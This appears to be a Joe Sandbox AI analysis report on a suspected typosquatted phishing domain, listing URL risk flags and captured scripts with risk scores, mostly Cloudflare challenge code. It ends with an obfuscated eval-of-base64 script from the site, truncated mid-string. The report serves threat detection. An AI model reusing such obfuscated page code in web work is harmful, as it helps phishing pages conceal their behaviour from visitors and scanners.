| URL: https://connexion-espacesclients.support Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://connexion-espacesclients.support |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "Script contains multiple high-risk indicators: heavily obfuscated data/URLs (encoded strings and tokens), suspicious domain pattern (connexion-espacesclients.support), and complex challenge/verification parameters suggesting potential security bypass or phishing attempt. The extensive use of encoded parameters and suspicious TLD (.support) adds to risk profile."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "connexion-espacesclients.support",cType: 'interactive',cRay: '8ec2a17a5e9b4271',cH: 'F7m_a4IJb.ldKgjE6gMJVyrke.F4qAGjM6mn8fY8EEY-1733219199-1.2.1.1-rYbojlDlPOsrT2veLluuRIO9DIfQXFVzaorlK74AaCGdUIZPJe7DwZBXzdQ.vr3V',cUPMDTk: "\/gkm\/?__cf_chl_tk=ikmDfOrsD_3PGWhiFgfOsLgIkMRFnIf6Cg1queg1K08-1733219199-1.0.1.1-pjQs1POxFuUapvCSUYkqFSNZD0TR_nfsaK15qyYdMpE",cFPWv: 'b',cITimeS: '1733219199',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/gkm\/?__cf_chl_f_tk=ikmDfOrsD_3PGWhiFgfOsLgIkMRFnIf6Cg1queg1K08-1733219199-1.0.1.1-pjQs1POxFuUapvCSUYkqFSNZD0TR_nfsaK15qyYdMpE",md: "vEYGBv7peezJ11GKOBdC2gvvDkE.VyiPbLWtYb92Yg8-1733219199-1.2.1.1-q3vygDGGc7sjMkVEeiQOt0UvpRkuX0NPxJqm0INPbFyhYgwRyGFsobmCfitAx0xJ.KGA.pWCWeKcYYWmYpJxCKknHo4W7ED_STXajJo6TeDIRi6ODeDhq.S_0wNmbLP3g4WaLHPY95Hv5k23aIVv1dNGo7muEthLYrg4LuKAI9UfbNZbLfJSgirSArxDbnvBcUWDwYFHbcCQnIUO10SYAwxJ8fZWML9onSWvjc.QQpub_1fTJuhyJJuC4LFSW8FDtzPedzZMJUlujkJcV6djvq31.RVtJvvy29jd.L2muWhe1_lTv0f9vIjRmXHKYceKhbtCGPSwx3BZcbV2D56BmT.kxvCu0xgPajdPgJrjwj500UPa4WV_M1t6_w4ItjcxhVtnhsBin2Xw3lUTQNW0pemuXbWBE7UDsc48lBXLZzpnyu7_6X_GZFQ.RxgUr3zeDv09QaupET2N74ypNJ6cRBimbV81eCtOTu02ewvLU5eBl1CORc4C.zogAVfOo.NnIxKqBCX7bK2cggh_ykncIovPKxPkesKMB2..Gunc15LkcjLfWQM.YJg65Qithz3q_DIZjkgnDNbAcZFtaMabv3uxE4PL_tA41TygoeAyJDanCV4Pm9vGC86rAk4LZQGZMybgnd0AzTWuK2r9XDk6okIrpx_i2NSv4olfNBEXkL3cPf2pJp1dKA__ws9i5Rmy7Wqe1SiuKaVm4QcRy34QlgmrrW6tCr6Z5EH.C5ZExY7YnzmiZDo8OtYx2K1_K6MrMf4ZVxHZ6C3AjaG.92ZMQ2SZUHzWt3X5.dqAv6wMkR.xk.BPKmL2qOTBUfu0WsJdBRkQ9YMTQqBJTRS6NMMYWS2cbfMyyEgysq7hiSZskoYzGKe3ezjlTFAEgsr9nwxs7MTW7fbY4pGOj5J2IGqcNrAubsNdycUFdxdlOzF7xaIa7ptDYi.nQVGjP3gsZeFOI9ZcpvqKc.cdCNY28eahRLouKPV1kkZN8JzPKEhlv5L0QP4GOy99mSLG1PyPXoyivWYjxP5okiZj._9PBC22XGscLCt6g3y3OeG4QslEl17GZ._sjTm4wzu0u6MDMEWaJesKLZo22qrJpHVqcyg2AQEslYXzoWMrPnJkkO.e_FuVwbdfAh_CA9wJxISmyst6a0Mdw7HgI6.DU8PE8ubhXNxefmhAOXGhq5LVss7ESGdm5wGdtJos0xwAiSV2U.FqSDbUnFZq6jAnllxE7Vh6fwggyoXz3PTLOQU.jExgZf7SXU2qy_CWHRE1CUXXS598YT2hxUojhzEvrYVQxETM0sbomc.DCeT_cBtXCO8z9Rsnl62mLJinubbINLbGF54Pg.AZkuI6GLahCidQ2xFucNedwm7l8M0yPtt5PSg4P5LNSOHU0nykT0uIBMcqzdlABrFPav8nM1NOsZlTWAEebOxHqTLoiTyMJmeuhGVD_RzK2iwL6MVSkw7oJeBPwLV3H9SOejI.jNdAXsgHZNAEBryNbyO_d69BImhCJrBAqtR.FSaG8xW0tk2F4LxPacL1rt2vPJlZECC7YN3uQO6iYi61dZfOG6xyGGAFEitFhm35aR9DNP6hEIQ9t5JWw1vjEhHd.tIKCvo8TBb074lipG5uDIRW9OsafRt6cCp4l34zPxF9gl_3fK89aesKcY6hX6y6_HuYtSmJH.X4dceHkGwkuNwd1XC5lbpzgYGf.o_6zbAS5FUS2AKeqMzRWi3O3oS4DIllsUZZi9qzFPCLEtEokdETsZsDpMWbGjV1HXQ6NLPktwLjpszpo6YucfhbD.RXminoHj2KCXbC0q.s.X56Vaf0.QpeKqWPPd8hw2p.sxidx9isI4Q.BFBc9mJYsvHGnyAjv32rlCS6xtYBIDO.xA39oG1aCznAZnAiW74sOjNAt_2uwB.V02I_VMZe",mdrd: "UJlfFiJyPqLKbC6VfaBV._RuZpHmgA5knDU9GqnmJfk-1733219199-1.2.1.1-NKkPySmn._RVwlzN17vmZg949V5DI0ke4efYAcrqHjTQuU5wSwSskYD4.F1O.SFgRC2R4kPbxPsrgYOAdEgPFBmjT5A0qL9DqfbjoKZ7NUdaGOKwm7y5rvA1GKx1ZE9D08_SqFBxQgSxYRb1FPBkNN9Lnb36Ss1BU04yQhYidr3bvASuP6mzbdId0yCRmlF2Qo2rV6daIC32OpjDsQg0mtpkrk2iFRIsiCz2xCkr0_9ciMcvWOZMQGEyci7457ps3Y54_txTZxbvLl1Bi.Qj1sPhNfnEvztNpJXc4m4_WkboYeGmbMxyNg6RaNWyxuQeQqGakr4nHz8JwrjOiMlCS00QXZSk7Yb2nJDM6RUk4AneQmzYznbXupt.fiBhAc2L0z9Wa0vbiEYiLr_zSrkeR4fzjoPa0X4Vjnwuisx0FFXcPR_5R.IW_jIc7IzUyWPT_uRe4cE5avfpdn.1MOfACcTXC.I_dMrJqo6BTsK.IV_IhDjRaXYpuZIgQrJTqakAx_y2lwjwqUR6h8urTfZ4hIVrP5UBDAwobB2edNMnNHl6K_3hQx7xUgCiu_werOFYuizivg8RgoeYU.e7fQGuNsZ5FgMZfTnSTttWbWcZpxUNvreNPx8tJjf3J36zEr.0sQm6Kp4MOYLYXZR9CLl0YXiMhl5w8YOfF._PiEAozGlPC7ZTbJQEK2.hjjopO7D4.mJvWTVuigUxCb975kq0t8nMUQpfclLVWMlJkuyAYbe6JbkTNdmksnON_14mHXiMnT3YqvwQvJAuleX.1bfUphTnbMwb8QR52C0ILJhDP1j3umjvtKPOppGkovY3t6tV13Ta7xf.NhiGu_1XyMDWwoYubGHJS3epfTpzodHC8tdTpjGDDypm3h8Vo9oADJVSOQ0_nnUobQ3r1m0MTmRffhcIXtsdWkAzWqQ4eG3fjrtXao8CC2XjfZzHtve1AkaUqR2KwlUqQqaX.USZvrdsysoZoYfYwnGeausd0dp2B9vIbcy_0LzQAeQjYVC54_QuwmWoKm7S6_F3GpEezEkn3OF9CNQL6ZvS33HN2ae6lo3XQ0GaBCTUjL29hqEnBG3vSkf0kmEt.E9dtaRPcTEBiprU5PRFDZBBenzDW6rzAnhxzNm8urVSeDW8EFHXFX_oIwy6WzqLM1EfVO1sLBNzZauceZI28UZZqYUsgEDlZ9WjRPZRzD99AhFYENPdo48wJYoVX4GON8AuC6CKMYIzQZlFyZ6Ev1KXGwHEQca.Tt_Ljh48nEhwaO7jF0lxLI9g1uVFevWhx.Bb8vbqonmYr |
| URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be legitimate Cloudflare Turnstile/Challenge code. It contains standard challenge verification logic, translations, and interactions with known trusted domain (cloudflare.com). While it uses some DOM manipulation and postMessage communication, these are standard practices for security challenges. The code is partially obfuscated but this is common for anti-bot systems."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_footer_privacy":"Privacy","human_button_text":"Verify%20you%20are%20human","turnstile_feedback_description":"Send%20Feedback","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_refresh":"Refresh","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_overrun_description":"Stuck%20here%3F","turnstile_verifying":"Verifying...","turnstile_feedback_report":"Having%20trouble%3F","turnstile_footer_terms":"Terms","turnstile_timeout":"Timed%20out","testing_only":"Testing%20only.","turnstile_success":"Success%21","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_failure":"Error","turnstile_expired":"Expired","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eU,eX,eZ,f0,f1,fd,fp,fv,fw,fx,fH,fS,fW,fX,fY,g2,g3,ga,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1640))/1*(-parseInt(gI(1188))/2)+parseInt(gI(1939))/3*(parseInt(gI(1786))/4)+-parseInt(gI(1784))/5*(-parseInt(gI(1674))/6)+-parseInt(gI(834))/7*(-parseInt(gI(1480))/8)+-parseInt(gI(514))/9*(-parseInt(gI(1089))/10)+-parseInt(gI(1927))/11*(parseInt(gI(812))/12)+-parseInt(gI(616))/13,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,789535),eM=this||self,eN=eM[gJ(601)],eO=function(f,gK,g,h,i,j,k,l,m){for(gK=gJ,g={},g[gK(1610)]=function(n,s){return n+s},g[gK(1906)]=function(n,s){return n%s},g[gK(949)]=function(n,s){return n-s},h=g,m,j=32,l=h[gK(1610)](eM[gK(1593)][gK(1566)]+'_',0),l=l[gK(1549)](/./g,function(n,s,gL){gL=gK,j^=l[gL(818)](s)}),f=eM[gK(438)](f),k=[],i=-1;!isNaN(m=f[gK(818)](++i));k[gK(1002)](String[gK(480)](h[gK(1906)](h[gK(949)](m&255.67,j)-i%65535+65535,255))));return k[gK(701)]('')},eM[gJ(615)]=function(e,gV,g,h,j){h=(gV=gJ,g={},g[gV(1663)]=function(i,j){return j!==i},g);try{if(h[gV(1663)](gV(1437),gV(1437)))j={},j[gV(986)]=gV(1613),j[gV(1058)]=e[gV(1593)][gV(1055)],j[gV(1797)]=gV(1717),j[gV(1739)][gV(1728)](j,'*');else return eR(e)}catch(j){return eP(eQ(e))}},eM[gJ(1208)]=function(gW,d,e,f,g){gW=gJ,d={},d[gW(1084)]=gW(1613),d[gW(1059)]=gW(721),d[gW(951)]=function(h,i){return h<<i},e=d,f=1,g=1e3*eM[gW(593)][gW(1252)](e[gW(951)](2,f),32),eM[gW(1587)](function(gX){gX=gW,eM[gX(1739)]&&(eM[gX(1511)][gX(1934)](),eM[gX(1511)][gX(392)](),eM[gX(1936)]=!![],eM[gX(1739)][gX(1728)]({'source':e[gX(1084)],'widgetId':eM[gX(1593)][gX(1055)],'event':gX(863) |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Cloudflare Turnstile (CAPTCHA/challenge) implementation script. It contains standard error handling, Promise implementations, and type definitions. While it uses some complex code patterns, these are typical for production JavaScript libraries and show no signs of malicious behavior."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be legitimate Cloudflare challenge JavaScript configuration code. It contains translations and metadata for Cloudflare's human verification system. While it includes URL parameters and encoded strings (+1), these are standard for Cloudflare's security services. The domain (cloudflare.com) is trusted (-1), and the behavior is consistent with legitimate security verification purposes."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"interactive_running":"Verify%20you%20are%20human%20by%20completing%20the%20action%20below.","challenge_running":"Verifying%20you%20are%20human.%20This%20may%20take%20a%20few%20seconds.","success_title":"Verification%20successful","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","location_mismatch_warning":"Website%20is%20not%20accessible%20via%20this%20address.","redirecting_text_overrun":"%25%7Bplaceholder.com%7D%20is%20taking%20longer%20than%20expected%20to%20reply.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","cookies_missing":"Please%20enable%20Cookies%20and%20reload%20the%20page.","turnstile_feedback_description":"Send%20Feedback","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","footer_text":"Performance%20%26amp%3B%20security%20by%20Cloudflare","time_check_cached_warning_aux":"%3Ca%20class%3D%22refresh_link%22%3ERefresh%20the%20page%3C%2Fa%3E%20to%20try%20again.%20If%20the%20issue%20persists%20attempt%20a%20different%20link%20to%20get%20to%20the%20desired%20page.%20Alternatively%2C%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","interstitial_helper_explainer":"%25%7Bplaceholder.com%7D%20uses%20a%20security%20service%20to%20protect%20against%20malicious%20bots.%20You%20may%20see%20this%20page%20while%20the%20site%20verifies%20you%27re%20not%20a%20bot.","interstitial_helper_title":"What%20is%20this%20Page%3F","stuck_helper_title":"Stuck%20on%20this%20page%3F","turnstile_overrun_description":"Stuck%20here%3F","js_cookies_missing":"Enable%20JavaScript%20and%20cookies%20to%20continue%20verification","redirecting_text":"Waiting%20for%20%25%7Bplaceholder.com%7D%20to%20respond...","check_thirdparty":"Please%20unblock%20challenges.cloudflare.com%20to%20proceed.","js_cookies_missing_aux":"%25%7Bplaceholder.com%7D%20needs%20to%20verify%20you%20are%20human%20before%20proceeding.%20Please%20enable%20JavaScript%20and%20cookies%2C%20then%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E.","favicon_alt":"Icon%20for%20%25%7Bplaceholder.com%7D","stuck_helper_explainer":"If%20you%20are%20stuck%20on%20this%20page%2C%20your%20device%20or%20connection%20has%20been%20flagged%20as%20a%20bot.%20Try%20resetting%20your%20device%20or%20internet%20connection%20%28e.g.%20router%29.%20For%20additional%20assistance%2C%20contact%20the%20site%20owners.","browser_not_supported_aux":"%25%7Bplaceholder.com%7D%20needs%20to%20verify%20you%20are%20human%20before%20proceeding.%20Your%20%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%27challenge.supported_browsers%27%3Ebrowser%20is%20unsupported%3C%2Fa%3E%20and%20unable%20to%20complete%20verification.%20Try%20a%20different%20browser%20or%20make%20sure%20your%20browser%20is%20updated%20to%20the%20newest%20version.","location_mismatch_warning_aux":"The%20address%20to%20the%20requested%20website%20has%20changed%20and%20is%20not%20accessible.%20Try%20a%20different%20link%20to%20get%20to%20the%20desired%20page%20or%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","page_title":"Just%20a%20moment...","human_button_text":"Verify%20you%20are%20human","review_connection":"%25%7Bplaceholder.com%7D%20needs%20to%20review%20the%20security%20of%20your%20connection%20before%20proceeding.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%2 |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This is a legitimate Cloudflare challenge script used for their security verification system. It contains standard postMessage communication between frames, interacts with a known trusted domain (cloudflare.com), and uses typical challenge-response patterns. The code is not obfuscated and follows expected security widget implementation patterns."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'sbzvu',
chlApiSitekey: '0x4AAAAAAAAjq6WYeRDKmebM',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: '1/kVL2t161R37ZZrj_',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8ec2a1afce5342c3',
cH: 'LVhVjc2GUjt4KUrrKlatjYuNYy.TpM1D15KyuowzWNQ-1733219207-1.1.1.1-4UB_qUNcxehIoPQBLOj8JKxrES_MTJtecrSl8p3tQFsnsw9KHikWPd3.TBP3alcv',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'CX5YAAsQhr9517DgTIUq0k_HiOrpxBG21kGCca4vmxE-1733219207-1.1.1.1-x0W0tsI93Ju.rH.tMX0nRZqkjZCQg53nchKlTr3AOPp8E.NMg6E1FAIeqhBYyD9CGgTfL6Otx1B9iCBvhlRMovOnOvI3zfOvucLaT2BjrcLy8jVn8VnFrDxHdU8nwBCtG5V7QKpIxOyGQhhAz5CMtBAxPvaKHjXBpMEi9.aeJqCDvu0ZKmUkj5V0gBSpvSh4YSgrbcxIJFe.4JBFRMOWUateIp45pO2OysDTe0FMhjcxnveBvHk1nflU7yI2qF9IWQLCixaoK280KvdIzlb5TLcrQYWydSGvDmvLVVD3Rx8A_Flszd0_T37n7OKTvTLlRyvGlSc7VKY6xtOagfyHSIbpTeheoP7vVQK8HjZCMkb.sMly5aqkJdFW5IXMqyQW0XSd46kmmmAd0We8s5yzoYMJBJZ0X_oByBmOpYUgIZxF1bZRvIWuZAHkCiEmfiibEvk4_G4T3RPsYImcsAXHUj339Wc1IkoqhC_BXiELSHtx2wskyC1olcH7EbUPgcpfPJ8u3SUfisFTTlPEH6KxB2qc4CsucEG1BbJO9XNWLPi8VSTToLs1oVEmXaVLaGZrHDxZD.tiMq641y6Jl8UHB4wCHIjLWDYB5TXKHVQ0BjViB4v8rbsIY8nIT3lX1gDhjPfJzXCX0ofd_Rm4yTcTh3CIhwAbcK_WlA4jboOGPn9DtCilm4YlR7EUtuOyqbWEd60UUt2mPe5AiHlGFnhyOXFkaqXMfr.hxcDdMs6_RzCjOVNS22Jesp6ZdQESAwUXFdH4JhuG_Qj7vaE.1_Su1bVzyXK7S5KvE6PCYp2wR7fmG2HUa91UymFNr966VF2j7yd02ZIGfVs3VJBTwAe3aAN2S0_FwZKP_MpOQWSWD.a5FtRQuGBxK07H7IY5KH8zFZLuZD3B4Ugz6tvGJYimJj.rlluG2IdMSXfYRDxjD2CaMDp.qsE8zyu39hrQB0YrTgjK1MQKnviD6e.cDNIeiALQizPsQbuZWXBQreOmlgjfMXiZKPKLCV2B2CujACh9JvxSdieSFtAqF1FEiznYlhp_vzVo6impqQTr2gTTNd584W3OYpsWt7.LvsVkrq1vcumnx73s61YdrslohwzDlLOFFz4Kqi2mEUS7pkDNx6W0GwsLUIftoSl6NaQdO.7E9QT2Lb3DemsrHeAnEWBlt2Yty5Z9o0ESQK2EPfKa1BC0wyqBFzf4CCCBCbQ7bcvNwhLIHcQ32_unWVFJunLa.F6mVWAZStqFKQsmJup2IrVnieTEAtIvFuQ2zAUuuM5U6i9qqRecgVox4W.pqxajxoQ8qWJTgjogHBwMY9ameg.KdidBgzs8qKzEIIYDR_ewPzdEjagTMiqXOz5BQ59ngQ',
cITimeS: '1733219207',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'sbzvu',
nextRcV: '1/kVL2t161R37ZZrj_',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "Script appears to be Cloudflare's DDoS protection challenge script but uses potentially risky practices: creates hidden iframe (+2), injects dynamic script content (+2). However, it's from a legitimate security service (-1) and serves a valid protection purpose. Main concern is the dynamic script injection pattern, though it's a known Cloudflare implementation."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ec2a22cfd83443e',t:'MTczMzIxOTIyOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High-risk script with multiple red flags: uses eval() with base64 encoded content (+3), contains obfuscated code (+3), performs aggressive DOM manipulation with form submission (+2). The script also includes bot detection logic and automatic form submission/page reloads, which could be used maliciously. The use of XMLHttpRequest to an internal endpoint '/gkm/' with encoded headers adds suspicion."
} |
eval(decodeURIComponent(escape(window.atob('KGZ1bmN0aW9uKCl7CiAgICAgICAgdmFyIGEgPSBmdW5jdGlvbigpIHt0cnl7cmV0dXJuICEhd2luZG93LmFkZEV2ZW50TGlzdGVuZXJ9IGNhdGNoKGUpIHtyZXR1cm4gITF9IH0sCiAgICAgICAgYiA9IGZ1bmN0aW9uKGIsIGMpIHthKCkgPyBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgYiwgYykgOiBkb2N1bWVudC5hdHRhY2hFdmVudCgib25yZWFkeXN0YXRlY2hhbmdlIiwgYil9OwogICAgICAgIGIoZnVuY3Rpb24oKXsKICAgICAgICAgICAgICAgICAgICAgICAgdmFyIG5vdyA9IG5ldyBEYXRlKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciB0aW1lID0gbm93LmdldFRpbWUoKTsKICAgICAgICAgICAgICAgICAgICAgICAgdGltZSArPSAzMDAgKiAxMDAwOwogICAgICAgICAgICAgICAgICAgICAgICBub3cuc2V0VGltZSh0aW1lKTsKICAgICAgICAgICAgICAgICAgICAgICAgZG9jdW1lbnQuY29va2llID0gJzZpcmFvYnhZWWpGbzBnbmJaNWtoeU5BeG9kWT1qNnlVTGlURTFpWFhIVVZOd0RzX1Rod1B1aTAnICsgJzsgZXhwaXJlcz0nICsgJ1dlZCwgMDQtRGVjLTI0IDA5OjQ3OjA3IEdNVCcgKyAnOyBwYXRoPS8nOwogICAgICAgICAgICAg